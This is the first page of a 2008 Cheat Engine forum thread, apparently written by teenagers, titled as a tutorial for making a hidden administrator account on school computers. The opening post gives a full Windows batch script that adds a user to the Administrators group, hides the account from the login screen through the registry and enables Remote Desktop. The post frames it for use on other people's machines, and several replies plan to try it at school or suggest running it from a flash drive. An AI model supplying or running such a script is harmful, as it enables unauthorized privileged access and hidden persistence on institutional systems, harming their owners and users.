Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


[Tutorial] Making a HIDDEN Admin Account (works at school)
Goto page 1, 2, 3, 4  Next
 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk
View previous topic :: View next topic  
Author Message
AdamWest
Master Cheater
Reputation: 0

Joined: 05 Jul 2007
Posts: 354
Location: Quahog, Rhode Island

PostPosted: Tue Apr 29, 2008 8:54 pm    Post subject: [Tutorial] Making a HIDDEN Admin Account (works at school) Reply with quote

Me and my friend made this yesterday...You can use this to make an admin account, and it works on MOST school systems.

I don't take any responsibility in the actions of idiots. THIS IS EDUCATIONAL ONLY.

Step 1

Open Notepad


Step 2

Paste in this code:

Code:
@Echo Off

SET /P usr=[Enter new username here:]

SET /P pwd=[Enter new password here:]

:: SET /P takes the user input and puts it into the variable.

echo — Creating New User, “%usr%” with password “%pwd%” –

net user “%usr%” “%pwd%” /add

echo — Adding User to Group Administrator –

net localgroup Administrators %usr% /add

echo — User Is Now Administrator — >>

echo — Hidding User –

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f

echo — Activating Terminal Service –

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0

echo — Activating Terminal Service Done –

SET /P =Press Enter to continue . . .

Exit


Step 3

Save the file as a .bat to your desktop (or another person's hard drive section...lol)

Step 4

Run the .bat, and enjoy. Totally hidden Admin account.

_________________

"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs
Back to top
View user's profile Send private message AIM Address
Ajax
Grandmaster Cheater Supreme
Reputation: 0

Joined: 28 Jan 2008
Posts: 1545

PostPosted: Tue Apr 29, 2008 9:47 pm    Post subject: Reply with quote

This is cool. I'll try it out when I go to school tomorrow.
_________________
http://forum.cheatengine.org/search.php < The almighty power of this forum =]

Every time someone uses my siggy, a noob dies, and a human being is born.

Drivers are always the answer to everything.
Back to top
View user's profile Send private message
iTz SWAT
I post too much
Reputation: 1

Joined: 20 Dec 2007
Posts: 2227
Location: Me.Location;

PostPosted: Wed Apr 30, 2008 3:13 am    Post subject: Reply with quote

I haven't tried but if it is hidden, how do you Log in ?
_________________
Back to top
View user's profile Send private message
tmocky
How do I cheat?
Reputation: 1

Joined: 30 Oct 2006
Posts: 2437

PostPosted: Wed Apr 30, 2008 6:47 am    Post subject: Reply with quote

Any somewhat well-protected school system will block MS-DOS commands (this includes batch scripting), so I'd be surprised if it'll actually work anywhere. Rolling Eyes
_________________
For the no-lifers amongst us. [X]

L. Casei Defensis.
Back to top
View user's profile Send private message
AdamWest
Master Cheater
Reputation: 0

Joined: 05 Jul 2007
Posts: 354
Location: Quahog, Rhode Island

PostPosted: Wed Apr 30, 2008 1:26 pm    Post subject: Reply with quote

tmocky wrote:
Any somewhat well-protected school system will block MS-DOS commands (this includes batch scripting), so I'd be surprised if it'll actually work anywhere. Rolling Eyes


Thanks for trying to flame me. But, you fail.

AdamWest wrote:
Me and my friend made this yesterday...You can use this to make an admin account, and it works on MOST school systems.



Works at my school, and it works well.

_________________

"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs
Back to top
View user's profile Send private message AIM Address
Psy
Grandmaster Cheater Supreme
Reputation: 1

Joined: 27 Mar 2008
Posts: 1366

PostPosted: Wed Apr 30, 2008 1:41 pm    Post subject: Reply with quote

Depends on what school it is.
Some are like they should be, locked-down quite tightly, whereas others are pretty much wide-open or have certain permissions set that can be easily bypassed. No-one is right to say either "it will work on all systems", or "it won't work at all"....
Back to top
View user's profile Send private message
SF
I'm a spammer
Reputation: 119

Joined: 19 Mar 2007
Posts: 6028

PostPosted: Wed Apr 30, 2008 2:19 pm    Post subject: Reply with quote

Won't work on mine, we get an 'action has been restricted by your network administrator' when doing anything with registry files. The rest may work, BUT they watch what every PC does, so we'd still get busted.
_________________
Back to top
View user's profile Send private message
AdamWest
Master Cheater
Reputation: 0

Joined: 05 Jul 2007
Posts: 354
Location: Quahog, Rhode Island

PostPosted: Wed Apr 30, 2008 2:42 pm    Post subject: Reply with quote

SaviourFamily wrote:
Won't work on mine, we get an 'action has been restricted by your network administrator' when doing anything with registry files. The rest may work, BUT they watch what every PC does, so we'd still get busted.


Easily bypassed...what kind of security setup does your school have? Mine uses a custom one...

_________________

"I myself am made entirely of flaws, stitched together with good intentions." - Augusten Burroughs
Back to top
View user's profile Send private message AIM Address
Lorrenzo
Moderator
Reputation: 4

Joined: 02 Jun 2006
Posts: 3744

PostPosted: Wed Apr 30, 2008 3:02 pm    Post subject: Reply with quote

How do you log on it if it's 'hidden'
Back to top
View user's profile Send private message
ebiru
Cheater
Reputation: 0

Joined: 27 Apr 2008
Posts: 44

PostPosted: Wed Apr 30, 2008 3:03 pm    Post subject: Reply with quote

Lorrenzo wrote:
How do you log on it if it's 'hidden'

crtl + alt + dele
enter user name
enter password
Back to top
View user's profile Send private message
Lorrenzo
Moderator
Reputation: 4

Joined: 02 Jun 2006
Posts: 3744

PostPosted: Wed Apr 30, 2008 3:16 pm    Post subject: Reply with quote

isn't working for me.

Password doesnt work, and it doesnt make it admin.
Back to top
View user's profile Send private message
Smart
Grandmaster Cheater
Reputation: 0

Joined: 19 Jan 2007
Posts: 697
Location: New Zealand

PostPosted: Wed Apr 30, 2008 3:35 pm    Post subject: Reply with quote

what if im using a mac?
theres no notepad.

_________________
Back to top
View user's profile Send private message
NeverForgotten
Grandmaster Cheater Supreme
Reputation: 2

Joined: 20 Oct 2007
Posts: 1616
Location: Wii

PostPosted: Wed Apr 30, 2008 4:04 pm    Post subject: Reply with quote

Smart wrote:
what if im using a mac?
theres no notepad.


Ya my school has gey macs

_________________
Back to top
View user's profile Send private message
tjake
Grandmaster Cheater Supreme
Reputation: 0

Joined: 05 Feb 2007
Posts: 1927
Location: At Your Bed Sleeping

PostPosted: Wed Apr 30, 2008 4:35 pm    Post subject: Reply with quote

what if ur school computer doesnt have notepad?

my school computer has nothing but,

paint and calculator.

they wont let u right click on anything but on websites.

they only got the supplies for what we use.
Back to top
View user's profile Send private message AIM Address MSN Messenger
Lorrenzo
Moderator
Reputation: 4

Joined: 02 Jun 2006
Posts: 3744

PostPosted: Wed Apr 30, 2008 5:02 pm    Post subject: Reply with quote

tjake wrote:
what if ur school computer doesnt have notepad?

my school computer has nothing but,

paint and calculator.

they wont let u right click on anything but on websites.

they only got the supplies for what we use.


Flash drive it. Razz
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk All times are GMT - 6 Hours
Goto page 1, 2, 3, 4  Next
Page 1 of 4

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites